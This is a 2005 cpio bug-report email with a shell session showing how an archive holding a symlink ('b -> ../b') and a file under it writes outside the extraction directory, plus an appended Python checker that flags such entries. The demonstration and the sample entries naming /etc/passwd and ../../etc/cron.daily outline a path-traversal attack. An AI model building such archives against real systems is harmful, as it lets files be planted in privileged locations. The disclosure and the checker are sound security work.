From: t takahashi
Subject: [Bug-cpio] Re: Bug#306693: cpio: allows extracting insecure pathnames (leading slash = / and dotdot = ..)
Date: Wed, 27 Apr 2005 19:54:54 -0700

P.P.S. I found a more subtle security hole. It is even more dangerous.

/tmp/aaa$ mkdir ../b
/tmp/aaa$ ln -s ../b b
/tmp/aaa$ touch ../b/trojan
/tmp/aaa$ ls b
trojan
/tmp/aaa$ find b b/trojan
b
b/trojan
/tmp/aaa$ find b b/trojan | cpio -o > dangerous
cpio: b: truncating inode number
cpio: b/trojan: truncating inode number
1 block
/tmp/aaa$ /bin/rm -v b/trojan b
removed `b/trojan'
removed `b'
/tmp/aaa$ ls
dangerous
/tmp/aaa$ cpio -t<dangerous
b
b/trojan
1 block
/tmp/aaa$ cpio -vt<dangerous
lrwxrwxrwx 1 kpc kpc 4 Apr 27 19:46 b -> ../b
-rw------- 1 kpc kpc 0 Apr 27 19:46 b/trojan
1 block

Notice that grep '\.\.' on the output of cpio -t would not find the
relative pathname. You have to use cpio -vt. Now watch this:

/tmp/aaa$ cpio -i<dangerous
1 block
/tmp/aaa$ ls
b dangerous
/tmp/aaa$ ls ../b
trojan

IMHO cpio should disallow this by default. Imagine
../../../../../../../etc/cron.daily again. cpio should check for
extracting in directories that are not below pwd, even if it is via
indirect means such as a symlink.
Wow!
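The check the report asks for, written here as an added example that is not from the mail or from GNU cpio: it replays an archive's entry list in extraction order, follows symlinks that earlier entries created, and rejects any entry that would land outside the extraction directory. The entry list, sample values and function names below are constructed for the example.

```python
import posixpath

def resolve_path(name, symlinks, max_hops=40):
    """Where `name` lands when extracted into the root, following symlinks earlier
    entries created ({relative path: target}). A result starting '..' or '/' escapes."""
    if name.startswith('/'):
        return posixpath.normpath(name)
    pending = [c for c in name.split('/') if c not in ('', '.')]
    cur, hops = '', 0                 # '' is the extraction root itself
    while pending:
        comp = pending.pop(0)
        if comp == '..':
            cur = posixpath.normpath(posixpath.join(cur, '..'))
            cur = '' if cur == '.' else cur
            continue
        nxt = posixpath.join(cur, comp)
        target = symlinks.get(nxt)
        if target is None:            # ordinary component: descend
            cur = nxt
            continue
        hops += 1
        if hops > max_hops:
            raise ValueError(f'symlink loop while resolving {name!r}')
        if target.startswith('/'):    # absolute link: the rest is outside the root
            return posixpath.normpath(posixpath.join(target, *pending))
        # relative link target is interpreted from the link's own directory
        pending = [c for c in target.split('/') if c not in ('', '.')] + pending
    return cur

def check_archive(entries):
    """entries: (name, type, link_target) in archive order as `cpio -vt` lists them
    ('l' = symlink). Returns (name, reason) for entries landing outside the root."""
    symlinks, rejected = {}, []
    for name, kind, target in entries:
        try:
            where = resolve_path(name, symlinks)
        except ValueError as exc:
            rejected.append((name, str(exc)))
            continue
        if where.startswith('/') or where == '..' or where.startswith('../'):
            rejected.append((name, f'resolves to {where}'))
        elif kind == 'l':             # accepted symlink: later entries may traverse it
            symlinks[where] = target
    return rejected

# Constructed sample: the report's `b -> ../b` plus `b/trojan`, with the dotdot,
# leading-slash and absolute-symlink variants of the same escape.
SAMPLE_ENTRIES = [('b', 'l', '../b'), ('b/trojan', '-', None), ('safe/file', '-', None),
                  ('../../etc/cron.daily/x', '-', None), ('/etc/passwd', '-', None),
                  ('lib', 'l', '/usr/lib'), ('lib/file', '-', None)]
```

Note that the symlink entry `b` itself is accepted (it lives inside the root); it is the later write to `b/trojan` that resolves to `../b/trojan` and is refused, which is exactly the case a plain `grep '\.\.'` on `cpio -t` misses.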